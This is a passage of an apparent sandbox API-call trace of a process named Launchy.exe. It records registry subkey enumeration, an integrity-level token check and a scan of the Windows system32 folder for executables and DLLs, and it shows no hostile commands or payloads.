dwIndex=0x29, lpName=0x18fd58, cchName=0x104 | out: lpName="Network") returned 0x0 [0060.282] lstrlenW (lpString="Network") returned 7 [0060.282] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1c) returned 0x6fac58 [0060.282] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x2a, lpName=0x18fd58, cchName=0x104 | out: lpName="NetworkProvider") returned 0x0 [0060.282] lstrlenW (lpString="NetworkProvider") returned 15 [0060.282] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1c) returned 0x6fac80 [0060.282] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x2b, lpName=0x18fd58, cchName=0x104 | out: lpName="Nls") returned 0x0 [0060.283] lstrlenW (lpString="Nls") returned 3 [0060.283] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x14) returned 0x6fa5b0 [0060.283] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x2c, lpName=0x18fd58, cchName=0x104 | out: lpName="NodeInterfaces") returned 0x0 [0060.283] lstrlenW (lpString="NodeInterfaces") returned 14 [0060.283] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x16) returned 0x6fa5d0 [0060.283] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x2d, lpName=0x18fd58, cchName=0x104 | out: lpName="Nsi") returned 0x0 [0060.283] lstrlenW (lpString="Nsi") returned 3 [0060.283] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x14) returned 0x6fa5f0 [0060.283] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x2e, lpName=0x18fd58, cchName=0x104 | out: lpName="PCW") returned 0x0 [0060.283] lstrlenW (lpString="PCW") returned 3 [0060.283] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x14) returned 0x6fa610 [0060.283] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x2f, lpName=0x18fd58, cchName=0x104 | out: lpName="PnP") returned 0x0 [0060.283] lstrlenW (lpString="PnP") returned 3 [0060.283] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x12) returned 0x6fa630 [0060.283] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x30, lpName=0x18fd58, cchName=0x104 | out: lpName="Power") returned 0x0 [0060.283] lstrlenW (lpString="Power") returned 5 [0060.284] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x18) returned 0x6fa650 [0060.284] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x31, lpName=0x18fd58, cchName=0x104 | out: lpName="Print") returned 0x0 [0060.284] lstrlenW (lpString="Print") returned 5 [0060.284] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x18) returned 0x6fa670 [0060.284] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x32, lpName=0x18fd58, cchName=0x104 | out: lpName="PriorityControl") returned 0x0 [0060.284] lstrlenW (lpString="PriorityControl") returned 15 [0060.284] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1e) returned 0x6faca8 [0060.284] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x33, lpName=0x18fd58, cchName=0x104 | out: lpName="ProductOptions") returned 0x0 [0060.284] lstrlenW (lpString="ProductOptions") returned 14 [0060.284] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1c) returned 0x6facd0 [0060.284] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x34, lpName=0x18fd58, cchName=0x104 | out: lpName="Remote Assistance") returned 0x0 [0060.284] lstrlenW (lpString="Remote Assistance") returned 17 [0060.284] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1a) returned 0x6fad20 [0060.284] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x35, lpName=0x18fd58, cchName=0x104 | out: lpName="SafeBoot") returned 0x0 [0060.284] lstrlenW (lpString="SafeBoot") returned 8 [0060.284] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x16) returned 0x6fa690 [0060.284] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x36, lpName=0x18fd58, cchName=0x104 | out: lpName="ScsiPort") returned 0x0 [0060.284] lstrlenW (lpString="ScsiPort") returned 8 [0060.285] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x16) returned 0x6fa6d0 [0060.285] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x37, lpName=0x18fd58, cchName=0x104 | out: lpName="SecurePipeServers") returned 0x0 [0060.285] lstrlenW (lpString="SecurePipeServers") returned 17 [0060.285] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1a) returned 0x6fad48 [0060.285] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x38, lpName=0x18fd58, cchName=0x104 | out: lpName="SecurityProviders") returned 0x0 [0060.285] lstrlenW (lpString="SecurityProviders") returned 17 [0060.285] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1e) returned 0x6fad98 [0060.285] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x39, lpName=0x18fd58, cchName=0x104 | out: lpName="ServiceGroupOrder") returned 0x0 [0060.285] lstrlenW (lpString="ServiceGroupOrder") returned 17 [0060.285] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1c) returned 0x6fade8 [0060.285] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x3a, lpName=0x18fd58, cchName=0x104 | out: lpName="ServiceProvider") returned 0x0 [0060.285] lstrlenW (lpString="ServiceProvider") returned 15 [0060.285] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1c) returned 0x6fae10 [0060.285] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x3b, lpName=0x18fd58, cchName=0x104 | out: lpName="Session Manager") returned 0x0 [0060.285] lstrlenW (lpString="Session Manager") returned 15 [0060.285] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1c) returned 0x6fae10 [0060.286] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x3c, lpName=0x18fd58, cchName=0x104 | out: lpName="SNMP") returned 0x0 [0060.286] lstrlenW (lpString="SNMP") returned 4 [0060.286] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x16) returned 0x6fa730 [0060.286] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x3d, lpName=0x18fd58, cchName=0x104 | out: lpName="SQMServiceList") returned 0x0 [0060.286] lstrlenW (lpString="SQMServiceList") returned 14 [0060.286] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x22) returned 0x6fb448 [0060.286] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x3e, lpName=0x18fd58, cchName=0x104 | out: lpName="Srp") returned 0x0 [0060.286] lstrlenW (lpString="Srp") returned 3 [0060.286] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x14) returned 0x6fa750 [0060.286] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x3f, lpName=0x18fd58, cchName=0x104 | out: lpName="SrpExtensionConfig") returned 0x0 [0060.286] lstrlenW (lpString="SrpExtensionConfig") returned 18 [0060.286] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x14) returned 0x6fa770 [0060.286] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x40, lpName=0x18fd58, cchName=0x104 | out: lpName="StillImage") returned 0x0 [0060.286] lstrlenW (lpString="StillImage") returned 10 [0060.286] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x18) returned 0x6fa770 [0060.286] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x41, lpName=0x18fd58, cchName=0x104 | out: lpName="Storage") returned 0x0 [0060.286] lstrlenW (lpString="Storage") returned 7 [0060.286] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1c) returned 0x6fae60 [0060.287] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x42, lpName=0x18fd58, cchName=0x104 | out: lpName="SystemResources") returned 0x0 [0060.287] lstrlenW (lpString="SystemResources") returned 15 [0060.287] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1a) returned 0x6fae88 [0060.287] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x43, lpName=0x18fd58, cchName=0x104 | out: lpName="TabletPC") returned 0x0 [0060.287] lstrlenW (lpString="TabletPC") returned 8 [0060.287] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1a) returned 0x6faeb0 [0060.287] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x44, lpName=0x18fd58, cchName=0x104 | out: lpName="Terminal Server") returned 0x0 [0060.287] lstrlenW (lpString="Terminal Server") returned 15 [0060.287] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1e) returned 0x6faed8 [0060.287] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x45, lpName=0x18fd58, cchName=0x104 | out: lpName="TimeZoneInformation") returned 0x0 [0060.287] lstrlenW (lpString="TimeZoneInformation") returned 19 [0060.287] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x16) returned 0x6fa7b0 [0060.287] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x46, lpName=0x18fd58, cchName=0x104 | out: lpName="usbflags") returned 0x0 [0060.287] lstrlenW (lpString="usbflags") returned 8 [0060.287] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1e) returned 0x6faf28 [0060.287] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x47, lpName=0x18fd58, cchName=0x104 | out: lpName="usbstor") returned 0x0 [0060.287] lstrlenW (lpString="usbstor") returned 7 [0060.287] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1c) returned 0x6faf50 [0060.288] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x48, lpName=0x18fd58, cchName=0x104 | out: lpName="VAN") returned 0x0 [0060.289] lstrlenW (lpString="VAN") returned 3 [0060.289] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x14) returned 0x6fa7f0 [0060.289] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x49, lpName=0x18fd58, cchName=0x104 | out: lpName="Video") returned 0x0 [0060.289] lstrlenW (lpString="Video") returned 5 [0060.289] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x18) returned 0x6fa810 [0060.289] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x4a, lpName=0x18fd58, cchName=0x104 | out: lpName="wcncsvc") returned 0x0 [0060.289] lstrlenW (lpString="wcncsvc") returned 7 [0060.290] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1c) returned 0x6faf78 [0060.290] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x4b, lpName=0x18fd58, cchName=0x104 | out: lpName="Wdf") returned 0x0 [0060.290] lstrlenW (lpString="Wdf") returned 3 [0060.290] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x14) returned 0x6fa830 [0060.290] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x4c, lpName=0x18fd58, cchName=0x104 | out: lpName="WDI") returned 0x0 [0060.290] lstrlenW (lpString="WDI") returned 3 [0060.290] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x14) returned 0x6fa850 [0060.290] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x4d, lpName=0x18fd58, cchName=0x104 | out: lpName="Windows") returned 0x0 [0060.290] lstrlenW (lpString="Windows") returned 7 [0060.290] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1c) returned 0x6fafa0 [0060.290] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x4e, lpName=0x18fd58, cchName=0x104 | out: lpName="Winlogon") returned 0x0 [0060.290] lstrlenW (lpString="Winlogon") returned 8 [0060.290] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1e) returned 0x6fafc8 [0060.290] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x4f, lpName=0x18fd58, cchName=0x104 | out: lpName="WMI") returned 0x0 [0060.290] lstrlenW (lpString="WMI") returned 3 [0060.290] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x14) returned 0x6fa870 [0060.290] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x50, lpName=0x18fd58, cchName=0x104 | out: lpName="hivelist") returned 0x0 [0060.291] lstrlenW (lpString="hivelist") returned 8 [0060.291] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1e) returned 0x6faff0 [0060.291] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x51, lpName=0x18fd58, cchName=0x104 | out: lpName="SystemInformation") returned 0x0 [0060.291] lstrlenW (lpString="SystemInformation") returned 17 [0060.291] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1a) returned 0x6fb018 [0060.291] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x52, lpName=0x18fd58, cchName=0x104 | out: lpName="Winresume") returned 0x0 [0060.291] lstrlenW (lpString="Winresume") returned 9 [0060.291] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x6fb018 [0060.291] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x53, lpName=0x18fd58, cchName=0x104 | out: lpName="winresume") returned 0x103 [0060.291] RegCloseKey (hKey=0xa4) returned 0x0 [0060.291] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Launchy.exe\" " [0060.291] StrChrW (lpStart="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Launchy.exe\" ", wMatch=0x22) returned="\" " [0060.291] StrChrW (lpStart="\" ", wMatch=0x20) returned=" " [0060.291] StrTrimW (in: psz="", pszTrimChars=" " | out: psz="") returned 0 [0060.291] GetVersion () returned 0x1db10106 [0060.291] GetCurrentProcess () returned 0xffffffff [0060.291] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20008, TokenHandle=0x18ff28 | out: TokenHandle=0x18ff28*=0xa4) returned 1 [0060.291] GetTokenInformation (in: TokenHandle=0xa4, TokenInformationClass=0x14, TokenInformation=0x18ff20, TokenInformationLength=0x4, ReturnLength=0x18ff2c | out: TokenInformation=0x18ff20, ReturnLength=0x18ff2c) returned 1 [0060.291] GetTokenInformation (in: TokenHandle=0xa4, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18ff2c | out: TokenInformation=0x0, ReturnLength=0x18ff2c) returned 0 [0060.292] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x14) returned 0x6fa890 [0060.292] GetTokenInformation (in: TokenHandle=0xa4, TokenInformationClass=0x19, TokenInformation=0x6fa890, TokenInformationLength=0x14, ReturnLength=0x18ff2c | out: TokenInformation=0x6fa890, ReturnLength=0x18ff2c) returned 1 [0060.292] GetSidSubAuthorityCount (pSid=0x6fa898*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x6fa899 [0060.292] GetSidSubAuthority (pSid=0x6fa898*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x6fa8a0 [0060.292] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x6fa890 | out: hHeap=0x6e0000) returned 1 [0060.292] CloseHandle (hObject=0xa4) returned 1 [0060.292] lstrlenW (lpString="") returned 0 [0060.292] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x2) returned 0x6f9dc8 [0060.292] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff20 | out: lpSystemTimeAsFileTime=0x18ff20*(dwLowDateTime=0x64d8a7a0, dwHighDateTime=0x1d64a6c)) [0060.293] GetWindowsDirectoryW (in: lpBuffer=0x0, uSize=0x0 | out: lpBuffer=0x0) returned 0xb [0060.293] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x220) returned 0x6fb478 [0060.293] GetWindowsDirectoryW (in: lpBuffer=0x6fb478, uSize=0xc | out: lpBuffer="C:\\Windows") returned 0xa [0060.293] lstrcpyW (in: lpString1=0x6fb48e, lpString2="system32" | out: lpString1="system32") returned="system32" [0060.293] lstrlenW (lpString="C:\\Windows\\system32") returned 19 [0060.293] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xfffe) returned 0x6fb6a0 [0060.322] lstrlenW (lpString="*.exe|*.dll") returned 11 [0060.322] lstrlenW (lpString=0x0) returned 0 [0060.322] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1a) returned 0x6fb040 [0060.322] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x250) returned 0x70b6a8 [0060.322] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\*", lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70b900 [0060.323] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.323] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e9f4a12, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x229791ec, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e9f4a12, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0409", cAlternateFileName="")) returned 1 [0060.323] lstrlenW (lpString="0409") returned 4 [0060.323] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x250) returned 0x70c948 [0060.323] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\0409\\*", lpFindFileData=0x70c948 | out: lpFindFileData=0x70c948*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e9f4a12, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x229791ec, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e9f4a12, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70dba0 [0060.324] FindNextFileW (in: hFindFile=0x70dba0, lpFindFileData=0x70c948 | out: lpFindFileData=0x70c948*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e9f4a12, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x229791ec, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e9f4a12, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.324] FindNextFileW (in: hFindFile=0x70dba0, lpFindFileData=0x70c948 | out: lpFindFileData=0x70c948*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e9f4a12, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x229791ec, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e9f4a12, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0060.324] FindClose (in: hFindFile=0x70dba0 | out: hFindFile=0x70dba0) returned 1 [0060.324] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70c948 | out: hHeap=0x6e0000) returned 1 [0060.324] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8cc6e3c, ftCreationTime.dwHighDateTime=0x1c9ea10, ftLastAccessTime.dwLowDateTime=0xc8cc6e3c, ftLastAccessTime.dwHighDateTime=0x1c9ea10, ftLastWriteTime.dwLowDateTime=0xc8cecf9c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x867, dwReserved0=0x0, dwReserved1=0x0, cFileName="12520437.cpx", cAlternateFileName="")) returned 1 [0060.324] lstrlenW (lpString="12520437.cpx") returned 12 [0060.324] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c98834, ftCreationTime.dwHighDateTime=0x1ca040b, ftLastAccessTime.dwLowDateTime=0x4c98834, ftLastAccessTime.dwHighDateTime=0x1ca040b, ftLastWriteTime.dwLowDateTime=0xc8d130fc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x8b9, dwReserved0=0x0, dwReserved1=0x0, cFileName="12520850.cpx", cAlternateFileName="")) returned 1 [0060.324] lstrlenW (lpString="12520850.cpx") returned 12 [0060.325] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8699fd85, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8699fd85, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x869c5ee6, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x20200, dwReserved0=0x0, dwReserved1=0x0, cFileName="aaclient.dll", cAlternateFileName="")) returned 1 [0060.325] lstrlenW (lpString="aaclient.dll") returned 12 [0060.325] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x9a) returned 0x70c948 [0060.325] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93cbbe2a, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x93cbbe2a, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x93d080eb, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x38e200, dwReserved0=0x0, dwReserved1=0x0, cFileName="accessibilitycpl.dll", cAlternateFileName="")) returned 1 [0060.325] lstrlenW (lpString="accessibilitycpl.dll") returned 20 [0060.325] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xaa) returned 0x70c9f0 [0060.325] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89c04678, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x89c04678, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0xf0e28ef0, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0x9a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACCTRES.dll", cAlternateFileName="")) returned 1 [0060.325] lstrlenW (lpString="ACCTRES.dll") returned 11 [0060.325] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x98) returned 0x70caa8 [0060.325] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10f51da3, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0x10f51da3, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x7d217650, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="acledit.dll", cAlternateFileName="")) returned 1 [0060.325] lstrlenW (lpString="acledit.dll") returned 11 [0060.325] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x98) returned 0x70dba0 [0060.325] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d698b07, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x7d698b07, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x7d217650, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1ea00, dwReserved0=0x0, dwReserved1=0x0, cFileName="aclui.dll", cAlternateFileName="")) returned 1 [0060.326] lstrlenW (lpString="aclui.dll") returned 9 [0060.326] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x94) returned 0x70dc40 [0060.326] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d3bd2e0, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9d3bd2e0, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9d3bd2e0, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xb200, dwReserved0=0x0, dwReserved1=0x0, cFileName="acppage.dll", cAlternateFileName="")) returned 1 [0060.326] lstrlenW (lpString="acppage.dll") returned 11 [0060.326] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x98) returned 0x70dce0 [0060.326] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3c37918, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb3c37918, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3c5da79, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xb5c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ActionCenter.dll", cAlternateFileName="")) returned 1 [0060.326] lstrlenW (lpString="ActionCenter.dll") returned 16 [0060.326] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xa2) returned 0x70dd80 [0060.326] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3c5da79, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb3c5da79, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3c5da79, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x83400, dwReserved0=0x0, dwReserved1=0x0, cFileName="ActionCenterCPL.dll", cAlternateFileName="")) returned 1 [0060.326] lstrlenW (lpString="ActionCenterCPL.dll") returned 19 [0060.326] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xa8) returned 0x70de30 [0060.326] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9adf355b, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9adf355b, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9ae196bb, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x31800, 